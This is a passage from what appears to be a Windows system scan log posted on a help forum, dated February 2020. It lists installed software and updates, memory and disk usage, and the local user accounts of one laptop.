Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Windows 10 (KB4023057) (HKLM\...\{5F01BF33-E873-4B83-B2CC-E4DEF494073E}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden
Update for Windows 10 (KB4480730) (HKLM\...\{D2CA80BE-F97F-45C7-AEE6-87742793EF70}) (Version: 2.53.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{A8CB3AA1-4ED7-4E95-BA0A-3DC927739A0E}) (Version: 1.24.0.0 - Microsoft Corporation) Hidden
VirusTotal Uploader 2.2 (HKLM\...\VTUploader) (Version:  - )
Vodafone Mobile Broadband (HKLM\...\{6BD14859-6B50-4283-99DA-E172B2F2D1B7}) (Version: 11.2.0.52566 - Vodafone)
Vodafone Mobile Broadband Additional Drivers Package (HKLM\...\{6A202677-20C8-42A7-B50F-4CEB657CB152}) (Version: 11.1.1.52318 - Vodafone)
Windows Setup Remediations (x86) (KB4023057) (HKLM\...\{49cd2afd-8679-48a5-90ab-e7044bee2465}.sdb) (Version:  - )
WinRAR 5.71 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.71.0 - win.rar GmbH)
========================= Devices: ================================
========================= Memory info: ===================================
Percentage of memory in use: 84%
Total physical RAM: 2724.35 MB
Available physical RAM: 417.28 MB
Total Virtual: 4004.35 MB
Available Virtual: 663.05 MB
========================= Partitions: =====================================
1 Drive c: () (Fixed) (Total:209.59 GB) (Free:162.75 GB) NTFS
2 Drive d: () (Fixed) (Total:383.95 GB) (Free:231.17 GB) NTFS
========================= Users: ========================================
User accounts for \\KAA-HP-LAPPY
Administrator            DefaultAccount           Glenn                    
Guest                    Martyn                   WDAGUtilityAccount       
========================= Minidump Files ==================================
No minidump file found
========================= Restore Points ==================================
**** End of log ****

Edited by tamarisk, 26 February 2020 - 01:35 PM.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US